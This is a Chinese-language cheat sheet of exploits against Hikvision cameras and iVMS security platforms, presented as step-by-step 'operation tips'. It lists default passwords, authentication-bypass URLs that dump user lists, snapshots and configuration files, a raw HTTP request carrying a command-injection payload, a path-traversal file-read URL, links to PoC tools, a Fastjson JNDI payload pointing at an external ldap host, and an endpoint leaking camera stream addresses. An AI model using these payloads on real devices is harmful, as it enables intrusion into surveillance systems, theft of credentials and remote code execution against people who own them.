1.弱口令 操作技巧: admin:12345/8888888 漏洞版本:大多数设备 2.身份认证绕过漏洞 操作技巧: http://ip/Security/users?auth=YWRtaW46MTEKYWRtaW46MTEK(获取所有用户列表) http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK(获取摄像头快照) http://ip/System/configurationFile?auth=YWRtaW46MTEK(下载摄像机配置文件,通过脚本解密配置文件获得账密信息) 解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor 漏洞版本:大多数设备 3.命令注入漏洞 操作技巧: PUT /SDK/webLanguage HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 89
$(ifconfig -a > webLib/dd.asp) 结果存储到了dd.asp中,直接访问dd.asp即可 漏洞版本:大多数设备 4.后台任意文件读取漏洞 操作技巧: http://ip/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini 漏洞版本:流媒体管理服务器 V2.3.5 5.任意文件上传漏洞 操作技巧: poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc 漏洞版本: 海康威视综合安防系统iVMS-5000 海康威视综合安防系统 iVMS-8700 6.Fastjson远程命令执行漏洞 操作技巧: POST /bic/ssoService/v1/applyCT HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Connection: close Host: 127.0.0.1 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Sec-Fetch-User: ?1 Te: trailers Content-Type: application/json Content-Length: 215 {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://2vyvoa.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="} 漏洞版本:大多数设备 7.信息泄露漏洞 操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头 漏洞版本:大多数设备
|